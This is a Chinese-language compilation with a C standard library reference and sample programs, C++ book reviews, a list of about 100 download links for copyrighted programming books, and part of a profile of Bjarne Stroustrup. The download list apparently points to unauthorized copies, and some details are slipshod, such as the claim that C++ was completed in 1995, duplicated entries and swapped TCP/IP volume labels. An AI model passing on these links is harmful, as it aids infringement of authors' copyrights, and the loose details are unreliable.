width, int (*fncomparison)(const void *, const void * ) );
与lfind基本相同
/////////////////////////////////////////////////////////////////////////////////////////////////
void * bsearch ( const void * key,const void * base,size_t num,size_t
width,int (*dncompare)(const void *,const void *));
因为函数执行的是binary serach，所以数组应该事先按从小到大的排序。
int fncompare (const void * elem1,const void elem2);
当 *elem1 < *elem2时返回值<0 ；当 *elem1 == *elem2时返回值0 ；
当 *elem1 > *elem2时返回值>0
/* bsearch example */
#include <stdio.h>
#include <stdlib.h>

int values[] = { 10, 20, 25, 40, 90, 100 };

int compare (const void * a, const void * b)
{
  return ( *(int*)a - *(int*)b );
}

int main ()
{
  int * pItem;
  int key = 40;
  pItem = (int*) bsearch (&key, values, 6, sizeof (int), compare);
  if (pItem!=NULL)
    printf ("%d is in the array",*pItem);
  else
    printf ("%d is not in the array",key);
  return 0;
}
//////////////////////////////////////////////////////////////////////////////////////////////
void qsort (void * base,size_t num,size_t width,
int (*fncompare)(const void *,const void *));
使用快速排序法进行排序。
int fncompare ( const void * elem1,const void * elem2);
如果*elem1 goes before *elem2则<0；如果*elem1 goes before *elem2则<0；
如果*elem1 == *elem2则 0；
如果*elem1 goes after *elem2则>0；
/* qsort example */
#include <stdio.h>
#include <stdlib.h>

int values[] = { 40, 10, 100, 90, 20, 25 };

int compare (const void * a, const void * b)
{
  return ( *(int*)a - *(int*)b );
}

int main ()
{
  int * pItem;
  int n;
  qsort (values, 6, sizeof(int), compare);
  for (n=0; n<6; n++)
  {
    printf ("%d ",values[n]);
  }
  return 0;
}

Output:
10 20 25 40 90 100
/////////////////////////////////////////////////////////////////////////////////////////
void swab (char * scr,char * dest,int num);
交换字节  交换scr指向的num个字节，并且将结果存储在dest。
交换scr中的每两个字节的数据，如果num是奇数，最后一个数据不会传到dest中。
/* swab example */
#include <stdio.h>
#include <stdlib.h>

/* global arrays: destination[] initialized with zeros */
char source [7] = "ABCDEF";
char destination [7];

int main ()
{
  swab (source, destination, 6);
  printf ("swab: %s -> %s\n", source, destination);
  return 0;
}
////////////////////////////////////////////////////////////////////////////////////////
max(a,b); 是宏定义 ＃define max(a,b) ((a)>(b)?(a):(b))
min(a,b); 是宏定义 ＃define min(a,b) ((a)<(b)?(a):(b))
////////////////////////////////////////////////////////////////////////////////////////
int rand (void);
返回一个伪随机数，此数在0到RAND_MAX范围内。它每次返回一个不相关的数。
此算法需要函数srand
产生更实际的随机数。RAND_MAX是在stlib.h中定义的常量。Its default value
is implementation defined
一个产生几乎全真的随机数的方法就是使用以秒表示的时间为参数的srand进行初
始化。如果产生一个范围的随机数，最好是用取余(%)操作。例如：rand()%25产
生0到24的值。
/* rand example */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main ()
{
  /* initialize random generator */
  srand ( time(NULL) );

  /* generate some random numbers */
  printf ("A number between 0 and RAND_MAX (%d): %d\n", RAND_MAX,
  rand());
  printf ("A number between 0 and 99: %d\n", rand()%100);
  printf ("A number between 20 and 29: %d\n", rand()%10+20);

  return 0;
}
////////////////////////////////////////////////////////////////////////////////////////
void srand (unsigned int seed);
初始化随机数 使用seed以便设置一个rand产生随机数的起点。
如果seed被设置为1，函数将被重新初始化为调用rand或srand之前的初始值。
为了产生真正的随机数，建议使用一个变化平凡的seed值。例如，函数time返回
的值
/* rand/srand example */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main ()
{
  /* initialize random generator */
  srand ( time(NULL) );

  /* generate some random numbers */
  printf ("A number between 0 and 100: %d\n", rand()%100);
  printf ("A number between 20 and 30: %d\n", rand()%10+20);

  return 0;
}

Output:
A number between 0 and 100: 93
A number between 20 and 30: 21

////////////////////////////////////////////////////////////////////////////////////////
NULL
NULL is a defined constant used to express null pointers, that is,
an unassigned pointer or a pointer that points nowhere. It is defined
as:
#define NULL 0
size_t
Defined type used as arguments for some functions that require sizes
or
counts specifications. This represents an unsigned value generally
defined
in header files as unsigned int:
typedef unsigned int size_t;
//////////////////////////////////////////////////////////////////////////////////
//////////stdio.h/stdio.h/stdio.h/stdio.h///stdio.h/stdio.h/stdio.h/stdio.h///////////////////////////////////////////////////////////////////////////////
//////////stdio.h/stdio.h/stdio.h/stdio.h///stdio.h/stdio.h/stdio.h/stdio.h/////////
//////////////////////////////////////////////////////////////////////////////////////

 

 

 

 

　　这几本让读者和我在期待的C/C++巨著就是这期我要推荐的——《Essential C++中文版》、《Effective C++中文版》、《The C++ Programming Language》和《C++ Primer》。

　　Essential C++（Addison Wesley Pub Co.，1999年10月第一版）的作者Stanley B.Lippman更是C++领域一流的大师级人物，他从1984年开始就与C++结下了不解之缘：参与了第一个C++编译器C Front的开发，曾经和C++之父Bjarne Stroustrup（详见下）一起在贝尔实验室的项目组工作、负责研究C++程序开发环境中的对象模型，后来又担任著名的C++Report杂志编辑，此后他到迪斯尼旗下的梦工厂出任软件技术总监（Software Technology Director），主要著述有Essential C++、C++Primer、C++Gems、Inside the C++ Object Model、C＃Primer等，关于作者的更详细信息可以到其个人网站（http://www.objectwrite.com，该网址笔者已验证无误）查询。Lippman当前在业界的影响力可以从最近发生的一件事情看出：不久前微软已经邀请了C++编程语言的先驱Stanley B.Lippman加盟它的Visual C++.Net开发小组，以打消广大的C++编程人员的疑虑。Essential C++是Lippman在C++ Primer之后的著作，可以说是厚积薄发的精髓之作。不要想当然地觉得这本书只有276页就是烹小鲜的入门向导——其实，我到觉得如果想通过一本书入门，1237页的C++ Primer或1109页的The C++ Programming Language更加适合。Essential C++分为7个章节，分别是C++基础、面向过程的编程风格、泛型编程风格、基于对象的编程风格、面向对象的编程风格、运用模板编程和异常处理。从结构的安排上我们可以看出作者的深意所在：并不是要手把手地教你键入和编译调试一个类似“Hello World”的程序，而是要一步一步地教会读者通过函数、指针、模板、类等构件形成一套完整的编程思想，在不同的需求情况下能够自如地使用面向过程或面向对象的方法进行程序设计，正如Bjarne Stroustrup在The C++ Programming Language一书中引用Kristen Nygaard（Simula语言的两位创造者之一）所说的“Programming is understanding”。如果你是一个新手，在阅读本书的时候不要忘了找一本更详细一些的参考教材——作者只用了30页的篇幅讲C++变成的基础知识，这里面还包括了数组、向量和指针等内容，《Essential C++中文版》（华中科技大学出版社，2001年8月第一版）已经出版，是侯捷的译著——恐怕业内很少有人不知道这位台湾大名鼎鼎电脑教育作家，建立在深刻理解基础上的翻译质量几乎可以说是无可挑剔了，但对于一些词汇的翻译方法和大陆翻译习惯的差异还有待磨合和改进（虽然译者坚持保留其繁体版译法）。

　　Effective C++（Addison Wesley Pub Co.，1997年9月第二版）没有教你C++语法或函数、对象、模板之类的东西，这是一本风格独到的经典技巧集，曾经获得过1992年度Jolt Award and Productivity Awards，作者教给你的是50个“改善程序技术与设计思维”的特别途径。Scott Meyers是C++业界公认的权威，主要从事软件开发咨询工作，活跃在全球各技术研讨会上，同时是C++ Report的重要专栏作家，知名著述出了Effective C++之外还有More Effective C++和Effective STL等，关于作者的更详细信息可以到其个人网站（http://www.aristeia.com）查询。《Effective C++中文版》（华中科技大学出版社，2001年9月第一版）也已经在国内翻译出版，译者还是侯捷。当你初步了解C++的全貌之后，Effective C++能够在短时间内大幅度地提高你C++编程的水平，此书的独特之处在于每一个你遇到的C++问题，Meyers都好像未卜先知地放在了书里，所有让你困惑的问题你几乎都可以在这本书中找到精辟的论述——如果能加Meyers的另一本巨著More Effective C++（Addison Wesley Pub Co.，1995年12月第一版）将更会锦上添花。本书在结构上分为改变旧有的C习惯、内存管理、构造析构函数与作业运算符、类与函数的设计和声明、类与函数的实现、继承关系与面向对象设计以及杂项讨论7个部分。很多人都认为你越熟悉C语言或其他面向过程的语言，在学习面向对象的语言的时候就会面临更大的困难，的确，如果你已经习惯了面向过程，在面向对象的时候你还是无法忘记过程，为此，Meyers在第一部分就提出了改变旧有的C习惯，通过几个小技巧让你能够尽量不受原有知识对新知识学习的干扰。在接下来的3个部分中，作者又针对让人头疼的内存管理问题（Java就宣称采用自动内存管理减少了编程复杂程度和出错几率是比C++的一大进步），随后，作者针对函数与类的构造析构、设计、实现等问题进行了详实的讨论，没有枯燥的长篇大论，都是结合实例的分析讲解——如果你刚学C++不久但已经可以独立编写一些简单的程序，你会发现所有被批判的问题程序中都可以找到自己的影子，这真是一件奇妙的事情！在“继承关系与面向对象设计”部分里作者没有喋喋不休地去讨论尚有争议的问题，而是把精力放在最基础的理念上，澄清了C++中类的继承体系设计与实现，并结合继承问题阐释了OOP。“杂项讨论”中作者主要讨论了编译、标准库等问题。打一个粗俗些的比方：Effec tiv e C++和M o re Effec tiv e C++就像是C++学习者的手挠，每一下都抓在你的痒处。

　　The C++ Programming Language（Addison Wesley Pub Co.，2000年2月第三版，高等教育出版社，2001年8月影印版）是无论哪一个C++学习者绝对、绝对不能错过的头号经典。Rogue Wave公司（Boland C++ Builder中STL方案的提供商）的Nathan Myers说：“15年之后，此书仍然是唯一一本无可替代的C++书籍。”只要有人推荐C++书籍，此书必在其中。正如侯捷先生1999年C++Primer繁体版前言中评价所说：“C++/OOP的领域极广……，不同的切入角度，都存在不同的经典好书。但如果考量的是语言全貌性（百科型）书籍，从来我只推荐两本，一是Bjarne Stroustrup的The C++ Programming Language，另一是Stanley B.Lippman的C++ Primer。这么说难免遗珠之憾，但是泰山北斗已现，又何必案牍劳形于墨瀚书海之中！这两本书都从C++盘古开天以来，一路改版，斩将搴旗，追奔逐北，成就一身荣光”。作者Bjarne Stroustrup是贝尔实验室大规模程序设计研究部门（Large-Scale Programming Research Department）负责人，AT&T、ACM成员，主要著述有The C++ Programm ing Language、The Design and Evolution of C++、The Annota ted C++ Reference Manual、C++ In-Depth Box Set（与别人合著）等。1979年Stroustrup开始开发一种语言，当时称为“C with Class”，后来演化为C++，并于1995年在贝尔实验室研制成功并投入使用的，Stro u strup也被称为“C++之父”，关于作者的更详细信息可以到其个人网站（http://www.research.att.com/~bs/homepage.html）查询。1998年，ANSI/ISOC++标准建立，同年，Strousturp推出了其经典著作The C++Programming Language的第三版。The C++Programming Language可是说非常全面、权威，充满了技术性极强的材料，很多地方值得反复回味与思索。Stroustrup说，他所接触和开发的软件无论是在大小、复杂性和难度来说，根本不是外界一般软件所能比拟的。本书虽然是一本计算机编程语言教程，但是处处体现出他对于软件开发和程序设计的看法。所以他在书中的很多观点虽然看上去不觉得有什么了不起的地方，但是当你面临到真正挑战的时候，就会深刻体会到其真知灼见非同一般。即便我们不考虑语言的障碍，这本书仍然比较难懂，作者很多地方点到即止，其中深意不是初学者能够真正领会的。这本书有个绰号——C++专家自学指南，也就是你必须先是专家，然后再来读此书自学提高。

　　C++ Primer是Lippman的成名大作——不要看到这个名字就真认为这是“C++的初级读本”，实际上它是一本标准的“从入门到精通”教材，目前该书的简体中文版还没有上市，我到处寻找其英文版也没能如愿，一个偶然的机会在朋友那里看到了侯捷（见上关于此书的评价）繁体中文版的C++Primer，大体翻看了一下，感觉此书在实例方面非常详尽，内容可谓是全面、权威，通俗易懂。初学者只要能够认真学通这本书，足以能自由使用C++编写程序，成为C++的高手。C++ Primer对标准C++提供了广泛的介绍，提供了一个思考性的C++学习方案，C++中的重要该概念诸如异常处理、容器类型、面向对象的程序设计等等都体现在字里行间，对语言规则也进行了深入地探讨，是一本非常好的入门也是提高的教程和参考。全书共分为20章，从C++最基本的元素、数据类型到面向过程的程序设计到泛型算法到基于对象与面向对象的程序设计等等，洋洋洒洒，蔚为大观。此书将由中国电力出版社近期推出简体中文版，由潘爱民（《COM原理与应用》的作者，《Visual C++技术内幕（第四版）》、《深入理解COM+》、《COM本质论》、《深入解析ATL》的译者）主译。

　　在国内，ISO/ANSIC/C++长期被忽视，很多软件公司的招聘广告上写的都是要求熟悉Visual C++或C++Builder——它们简直就成了C/C++的代名词！但ISO/ANSIC/C++有其不可替代的重要性，特别是在软件移植方面，记得我蓝格软件公司的董事长林燕峰先生（KCOM Space的作者）曾经和我说过要保证软件开发的可移植性和开发的可协作管理就必须遵从业界标准。值得庆幸的是今年出版界对标准C/C++书籍的渴求终于重视起来，纷纷出版经典C/C++书籍。关于C/C++的“不学C，无以言”到此已经结束，但并不是说已经囊括了C/C++的全部经典书籍，像Exceptional C++（Herb Sutter著，Addison Wesley Pub Co.，1999年12月第一版）、《实用C语言编程》（Steve Oualli著，O Reilly & Associates，1997年9月第三版，中国电力出版社，2000年5月中文第三版）、《C/C++嵌入式系统编程》（Michael Barr著，O Reilly & Associates，1999年2月第一版，中国电力出版社，2001年3月中文第一版）等等，或因不得见其书、或因技术领域太过专细，皆成明代遗贤。

[下载]优秀IT书籍下载集锦100本

[下载]优秀IT书籍下载集锦100本
优秀IT书籍下载集锦100本

0. 精彩网址
[url]http://www.cfanclub.net/fav.htm[/url]
1.vc++技术内幕第四版 (潘爱民)
[url]ftp://210.32.157.56/[/url]课件/c++primer/vc++技术内幕IV(潘爱民).rar
2.C++经典对话系列
中文[url]http://www.jka77.com/book/cvst_cn.chm[/url]

3.MFC Windows 程序设计(第二版)
英文版[url]http://www.jka77.com/book/progmfc2.chm[/url]
中文版：暂无，制作中...
4.Effective C++中文版：
[url]http://dlb.pchome.net/development/reference/effectiveCplus.zip[/url]
5.More Effective C++中文版-zhc译
[url]http://cable.pchome.net/development/reference/MEC0410.zip[/url]

6.More Effective C++中文版-候捷译
[url]http://www.nethovel.com/resources/MoreEffectiveC++(WQ).zip[/url]

7.Essential C++中文版(全)－候捷译
[url]http://www.nethovel.com/resources/Essential%20C++[/url]中文版(全).rar

8.深入浅出MFC 2/e
[url]http://218.30.21.125:8084/ebook/programme/mfc2e.zip[/url]

9.代码大全中文版
[url]http://www.delphidevelopers.com/docs/tecsubject/cc/CodeComplet110.zip[/url]

11.C++经典对话系列
中文[url]http://www.jka77.com/book/cvst_cn.chm[/url]

12.MFC Windows 程序设计(第二版)
英文版[url]http://www.jka77.com/book/progmfc2.chm[/url]
中文版：暂无，制作中...

13.数据结构 C++ 语言描述(中文版)
[url]http://www.code-labs.com/manual/c_c015.zip[/url]

14.Java编程思想中文版
[url]ftp://202.118.72.12/pub/doc-book/Java/Java[/url]编程思想.zip

15.C++标准库英文版
[url]ftp://166.111.64.4/incoming/[/url]新文件夹/f/The%20C++%20Standard%20Library(with%20TOC).pdf

16.Windows核心编程
英文[url]http://www.fmdstudio.net/book/prgapps4.zip[/url]

17.TCP-IP详解卷1：协议
[url]ftp://202.204.4.161/[/url]学习资料/TCPIP/TCP-IP详解卷1：协议.pdf

18.TCP-IP详解卷2：实现
[url]ftp://202.204.4.161/[/url]学习资料/TCPIP/TCP-IP详解卷3：TCP事务协议，HTTP，NNTP.pdf

19.TCP-IP详解卷3：TCP事务协议
[url]ftp://202.204.4.161/[/url]学习资料/TCPIP/TCP-IP详解卷2：实现.pdf

20.实用算法的分析与程序设计
[url]ftp://202.204.8.10/[/url][4]%20编程资源/[%20书籍资料%20]/[算法与数据结构]/实用算法的分析与程序设计.rar

21.vc++技术内幕第四版 (潘爱民)
[url]ftp://210.32.157.56/[/url]课件/c++primer/vc++技术内幕IV(潘爱民).rar

22.C++ Primer英文版：
[url]http://computerstep.w18.net/C/C++%20Primer.zip[/url]

23.Effective C++中文版：
[url]http://dlb.pchome.net/development/reference/effectiveCplus.zip[/url]

24.More Effective C++中文版-zhc译
[url]http://cable.pchome.net/development/reference/MEC0410.zip[/url]

25.More Effective C++中文版-候捷译
[url]http://www.nethovel.com/resources/MoreEffectiveC++(WQ).zip[/url]

26.Essential C++中文版(全)－候捷译
[url]http://www.nethovel.com/resources/Essential%20C++[/url]中文版(全).rar

27.Programming Windows程式开发设计指南－Petzoldi著 余孟学 译
中文版[url]http://www.nethovel.com/resources/ProgrammingWindows_tw.chm[/url]
英文版[url]http://www.nethovel.com/resources/Petzoldi.chm[/url]

28.WinAsm32汇编教程－ Iczelion
[url]http://www.nethovel.com/resources/winasm.chm[/url]

29.Windows 95 程序设计指南－候捷译
[url]http://www.nethovel.com/resources/win95adg.zip[/url]

30.Thinking in C++ 2nd Edition(C++编程思想)
英文版[url]http://www.nethovel.com/resources/ThinkinginC++.zip[/url]
中文版[url]http://www.dingbing.com/book/thinkc.zip[/url]

31.人月神话－中文版
[url]http://www.goodassister.com/book/rysh.pdf[/url]

32.The C++ Programming Language英文
[url]http://computerstep.w18.net/C/The%20C++%20Programming%20Language.rar[/url]

33.VC技术内幕第五版[url]http://www.helpwork.com/downdata/book/programming/vc/book/vc++2/invcpp5.chm[/url]

34.com技术内幕
[url]http://www.helpwork.com/book/html/user/download.asp?id=1123[/url]

35.com＋技术内幕
[url]http://www.helpwork.com/book/html/user/download.asp?id=952[/url]

36.新编 Windows API参考大全
[url]http://www.4046.com/nnsrc/down/WindowsAPIdq.rar[/url]

37.The C programming Language // By Brian W. Kernighan and Dennis M. Ritchie
下载地址[url]http://www.jka77.com/book/The_C_programmin.chm[/url]

38.C语言编程手册
下载地址[url]http://www.jka77.com/book/CL.chm[/url]

39.Delphi 7高效数据库程序设计
By 李维
下载地址[url]http://www.codestudy.net/book/download.asp?id=1163&sort=5[/url]

40.Windows网络编程(第2版)
By Anthony Jones,Jim Ohlund 清华大学出版社
下载地址：英文版[url]http://www.guxiang.com/epubcn/readings/diannaotushu/500/download/1107/network_prog_for_win_2nd.zip[/url]

41.Windows2000编程技术内幕
By Mickey Williams 机械工业出版社
下载地址[url]ftp://ftp.frontfree.net/Pub/Books/C&C++/VC/Windows2000[/url]编程技术内幕.rar

42.数据仓库
By W.H.Inmon 清华大学出版社
下载地址1http://tips.9hao.com/vvbksd/20011120/数据仓库.zip
下载地址2:[url]ftp://ftp.math.nankai.edu.cn/Ebook/China-pub/chinapub_computerscience_multimedia/ComputerScience/%CA%FD%BE%DD%B2%D6%BF%E2/[/url]

43.编码的奥秘
By Charles Petzold 机械工业出版社
下载地址[url]ftp://ftp.math.nankai.edu.cn/Ebook/China-pub/chinapub_computerscience_multimedia/ComputerScience/%B1%E0%C2%EB%B5%C4%B0%C2%C3%D8/[/url]

44.编译原理及实践
By Louden, K.C 机械工业出版社
下载地址[url]ftp://ftp.math.nankai.edu.cn/Ebook/China-pub/chinapub_computerscience_multimedia/ComputerScience/%B1%E0%D2%EB%D4%AD%C0%ED%BC%B0%CA%B5%BC%F9/[/url]

45.Inside C++ Object Model(深度探索C++对象模型）
By Lippman 候捷译
下载地址[url]http://www.jka77.com/book/inside-the-cpp-object-model.pdf[/url]

46.C++标准程序库
By Josuttis
下载地址1http://www.codestudy.net/book/download.asp?id=1205&sort=5
下载地址2:[url]ftp://ftp.math.nankai.edu.cn/Ebook/C_C++/The[/url] Cpp Standard Library.pdf

47.STL源码剖析
By 候捷
下载地址[url]ftp://ftp.math.nankai.edu.cn/Ebook/C_C++/STL[/url]源码剖析--侯捷.pdf

48.C++批判(第三版) -看看C++的坏话！
By I don't know
下载地址[url]http://www.jka77.com/book/CPPPP.pdf[/url]

49.程序设计实践
下载地址[url]ftp://ftp.math.nankai.edu.cn/Ebook/China-pub/chinapub_computerscience_multimedia/%B3%CC%D0%F2%C9%E8%BC%C6%CA%B5%BC%F9/[/url]

50.c++沉思录
By Andrew Koenig Barbara Moo 人民邮电出版社
下载地址[url]http://www.codestudy.net/book/download.asp?id=1261&sort=5[/url]

51.C++Builder4技术内幕 (这本书俺不知道好不好:-)）
By I don't Know
下载地址[url]http://www.codestudy.net/book/download.asp?id=1254&sort=5[/url]

52.下面两本书一般大家硬盘里都有的吧，而且很老了，但是为了全面，就提上来吧
(1)Windows 95 程式设计指南 - 候捷
下载地址[url]http://jjhou.csdn.net/win95-a-developers-guide.pdf[/url]
(2)Windows 95 系统程式设计大奥秘 - 候捷
下载地址[url]http://jjhou.csdn.net/windows95-system-programming-secrets.pdf[/url]

53. 中国大百科全书·数学
下载地址[url]ftp://ftp.math.nankai.edu.cn/Ebook/[/url]中国大百科全书/中国大百科全书·数学.pdf

54、4.0M Bjarne Stroustrup - The C++ Programming Language
[url]http://www.u-n-f.com/books/archive/The%20C++%20Programming%20Language.tar.gz[/url]

55、1.0M Richard Stevens - TCP-IP Illustrated
[url]http://www.u-n-f.com/books/archive/TCP-IP%20Illustrated.tar.gz[/url]

56、4.5M Randall Hyde - Art Of Assembly
[url]http://www.u-n-f.com/books/archive/Randall%20Hyde%20-%20Art%20Of%20Assembly.tar.gz[/url]

57、2.1M M. Abrash - Zen of Graphics Programming
[url]http://www.u-n-f.com/books/archive/M.%20Abrash%20-%20Zen%20of%20Graphics%20Programming.zip[/url]

58、249k Kernighan and Ritche - The C Programming Language
[url]http://www.u-n-f.com/books/archive/Kernighan%20and%20Ritchie%20-%20The%20C%20Programming%20Language.zip[/url]

59、3.3M Bruce Schneier - Applied Cryptography
[url]http://www.u-n-f.com/books/archive/Bruce%20Schneier%20-%20Applied%20Cryptography.zip[/url]

60、PHP4_Grundlagen_und_Profiwissen
[url]http://www.u-n-f.com/books/archive/lamp/PHP4_Grundlagen_und_Profiwissen.pdf[/url]

61.《C++ Builder高级编程技术》
[url]http://www.dingbing.com/book/builder.zip[/url]

62.《VC++ 6.0 TLR 模板库参考手册》
[url]http://www.easysea.com/diannao/download/prog/c/mbkc.zip[/url]

63.《BORLAND C++ BUILDER 实用培训教程》
[url]http://202.101.232.120/book/openfile.asp?id=223&filename=BC98_CB526.zip[/url]

64.《Delphi高级开发指南》
[url]http://www.pcbookcn.com/s10899book/program/delphi/Delphi_gjkfzn_for3.rar[/url]

65.《新编 Windows API参考大全》
[url]ftp://book:book@down.pcbookcn.com/pro/delphi/[/url]新编Windows_API_参考大全.rar

66.《Delphi深度历险-附书源码》
[url]http://www.pcbookcn.com/s10899book/program/delphi/Delphi_sdlx_code.rar[/url]

67.《Delphi 7高效数据库程序设计》
[url]ftp://book:book@down.pcbookcn.com/pro/delphi/[/url]李维的新书《Delphi7高效数据库程序设计》.rar

68.《Delphi7开发指南》
[url]ftp://book:book@down.pcbookcn.com/pro/delphi/delphi7[/url]开发指南.rar

69.《Delphi6集成开发环境》
[url]ftp://book:book@down.pcbookcn.com/pro/delphi/Delphi6[/url]集成开发环境.rar

70.《Delphi6数据库编程》
[url]ftp://book:book@down.pcbookcn.com/pro/delphi/Delphi6[/url]数据库编程.rar

72.《Delphi5.xADO_MTS_COM+高级程序设计篇》
[url]ftp://book:book@down.pcbookcn.com/pro/delphi/Delphi5.xADO_MTS_COM+[/url]高级程序设计篇.rar

73.《VISUAL BASIC 编程标准》
[url]http://www.dingbing.com/book/vb.zip[/url]

74.《Visual Basic6.0中文版程序员指南》
[url]http://www.easysea.com/diannao/download/prog/vb/zwbc.zip[/url]

75.《Visual Basic 6.0 控件参考手册》
[url]http://www.easysea.com/diannao/download/prog/vb/kjck.zip[/url]

76.《Visual Basic 6.0中文版语言参考手册》
[url]http://www.easysea.com/diannao/download/prog/vb/zwby.zip[/url]

77.《Visual Basic 6.0 开发宝典》
[url]http://www.easysea.com/diannao/download/prog/vb/kfbd.zip[/url]

78.《Visual Basic 6.0 实例教程》
[url]http://www.easysea.com/diannao/download/prog/vb/sljc.zip[/url]

79.《VB 6.0 中文版实用参考手册》
[url]http://www.easysea.com/diannao/download/prog/vb/syck.zip[/url]

80.《Visual Basic 6开发人员指南》
[url]http://www.easysea.com/diannao/download/prog/vb/kfzn.zip[/url]

81.《VB 和 SQL Server 编程指南（第五版）》
[url]http://www.easysea.com/diannao/download/prog/vb/bczn.zip[/url]

82.《Jbuilder 5 中文帮助》
[url]http://www.pdown.net/download.asp?downid=2&id=991[/url]

83.《JBuilder开发人员指南》
[url]http://youth.dlmu.edu.cn/book/list_down.php?bkid=224[/url]

84.《Win32的Internet函数说明》
档案大小： 245248K
[url]http://www.easysea.com/diannao/download/prog/windows/win32int.zip[/url]

85.《Visual InterDev 从入门到精通》
[url]http://www.easysea.com/diannao/download/prog/interdev/crmd.wdl[/url]

86.《Visual InterDev 6.0 Web 参考手册 》
[url]http://www.easysea.com/diannao/download/prog/interdev/jsck.zip[/url]

87.《Visual InterDev 6.0 Guide 程序员》
[url]http://www.easysea.com/diannao/download/prog/interdev/cxyz.zip[/url]

88.《javascript 程序开发手册》
[url]http://www.cty99.com/Templet/bookdownmore.asp?booktype=script#[/url]

89.《JAVA 大全》
[url]http://www.easysea.com/diannao/download/prog/java/cxkf.zip[/url]

90.《Visual J++ 6.0 WFC 类库参考手册》
[url]http://www.easysea.com/diannao/download/prog/java/lkck.zip[/url]

91.《Java联想（中文）》
[url]http://www.easysea.com/diannao/download/prog/java/lkck.zip[/url]

92.《Oracle 8 实用大全》
[url]http://www.easysea.com/diannao/download/prog/oracle/sydq.zip[/url]

93.《Microsoft SQL Server 管理员手册》
[url]http://www.easysea.com/diannao/download/prog/sql/glys.zip[/url]

94.《掌握ACCESS开发》
[url]http://www.easysea.com/diannao/download/prog/sql/glys.zip[/url]

95.《Oracle Performance Tuning and Optimization》
[url]http://www.oradb.net/book/oracle_pt.zip[/url]

96.《Oracle ProC 程序设计》
[url]http://www.oradb.net/book/oracleproc.zip[/url]

97.《Oracle8初学者指南》
[url]http://www.easysea.com/diannao/download/prog/oracle/cxzz.zip[/url]

98.《RED HAT LINUX 6大全》
[url]http://www.dingbing.com/book/redhatall.zip[/url]

99.《RED HAT LINUX 6管理工具》
[url]http://www.dingbing.com/book/redhatman.zip[/url]

100.《VC++高级编程》
[url]http://www.easysea.com/diannao/download/prog/c/vcgj.zip[/url]

真实的C++之父

——Bjarne Stroustrup访谈录

赵玉勇

Bjarne Stroustrup简介

 

图Bjarne Stroustrup先生在他的办公室，这是他的个人网站上的相片

 

许多重要人物之所以成名，或者是因为其改变了历史或者是因为其创造了历史，Bjarne Stroustrup先生，C++之父，属于后者；归结个人成功的原因，理由可能有许多，但他只有浅显的两个一点点：他比多数人天真和理想主义那么一点点；比多数人花在解决问题上的时间多一点点。

C++程序设计语言是一种承前启后，被数以百万计的程序员应用在各个领域中的语言，我们正在使用的Windows操作系统，我们上网用的浏览器IE无不是出自C++的手笔。

C++是一种重要的和比较流行的计算机语言之一，也是未来十年内仍然发挥重要作用的语言。C++语言是一种通用的应用广范的程序设计语言，是一种既支持传统的结构化程序设计，又支持面向对象程序设计的系统复杂的语言。C++对C语言的扩充首先由 Stroustrup先生于1980年在贝尔实验室提出的，于1983年改名为C++。尽管C++的祖先C语言是世界上最受喜爱和应用最广的专业程序设计语言之一，但C++的发明是必需的。C++的本质就是让程序员理解和管理更大更复杂的程序。而对这种语言有着最大贡献的C++之父又是怎样一个人呢？

Bjarne Stroustrup先生，1950年生于丹麦港口城市奥尔胡斯，1975年在奥尔胡斯大学毕业，1979年获得剑桥大学计算机科学博士学位。他是C++语言的设计者和实现者，现在是得克萨斯州A&M大学计算机系教授。1979年他来到美国的新泽西州并加入贝尔实验室，与C语言之父、1983年图灵奖得主Dennis Ritchie以及大名鼎鼎的Brian Kernighan（两人合著《C程序设计语言》）共事多年，期间参与了贝尔实验室的C语言标准化活动。他的研究兴趣十分广泛，包括分布式系统、操作系统、仿真、设计以及编程，Bjarne还积极推动C++的ANSI/ISO标准化。

20世纪90年代以后，Bjarne Stroustrup步入人生的最辉煌时期。

1990年，Bjarne荣获《财富》杂志评选的“美国12位最年轻的科学家”称号。

1993年，由于在C++领域的重大贡献，Bjarne获得了ACM该年度的 Grace Murray Hopper大奖并成为ACM院士（成立于1947年的ACM协会是历史最悠久、目前世界上最大的教育和科学计算协会，成为ACM院士是个人成就的里程碑）。

1995年，BYTE杂志颁予他“近20年来计算机工业最具影响力的20人”的称号。

除了他的专业研究领域外，他对历史，通俗文学，摄影，运动，旅行和音乐等有广泛的兴趣。他对C++语言的推广也做出了极大的贡献，他写的书“The C++ Programming Language《C++程序设计语言》”已经成为这种语言中最为流行的学习资料，至少被翻译成18种语言。

 

给中国程序员最美好的祝愿

2004年12月8日，杭州，C++之父Bjarne Struostrup先生再次来到中国。我们有幸采访到了这位大师！请看大师给中国程序员的最美好祝愿。

问： 您对中国和中国的程序员有什么认识？您想对他们说点什么吗？

Bjarne Stroustrup：中国是个大国，并且她有许许多多有趣的文化。我想和中国程序员说的和对其他国家的程序员说的是一样的，所以我有如下的回答：优秀软件所具有的特点和技术在全世界都是通用的。

图 C++之父给中国程序员最美好的祝愿

 

现在，成为一名电脑高手是许多年轻学生的梦想，面对Stroustrup这样一位大师级人物的出现，最令我们感兴趣的问题莫过于：Bjarne成为大师的历程是什么样子的呢？

Bjarne Stroustrup先生出生的奥尔胡斯市是日德兰半岛东海岸的一个美丽的小城，那里每家都有自己的小公寓，公寓里有个小院，小院是孩子们踢足球的地方，那时，成为一名足球明星比成为一名电脑高手是更可行的想法，做一名电脑名星好象是很遥远的事情，因为个人不太可能拥有一台昂贵的计算机。很幸运，在大学时他就用上了系里的计算机，它叫GIER，是一台旧的丹麦计算机，有一个房间那么大，程序都写在磁带上面，他用它学习Algol 60程序设计。

而对Bjarne生活产生质的变化的事情是什么呢？

他认为在他的发展生涯中，最关键的一个项目是在剑桥大学攻读博士学位时用Simula67计算机做的模拟分布式系统。做这个项目除了使他成为一名顶尖的程序设计高手外，更使他养成了程序员应具有的沟通和交流能力，这为他后来的发展奠定了坚实的基础。

 

 

B与C

Bjarne和C有缘。

Bjarne Stroustrup先生和C（China中国）有缘，对他来说中国是一个神秘、美丽而有趣的国度。

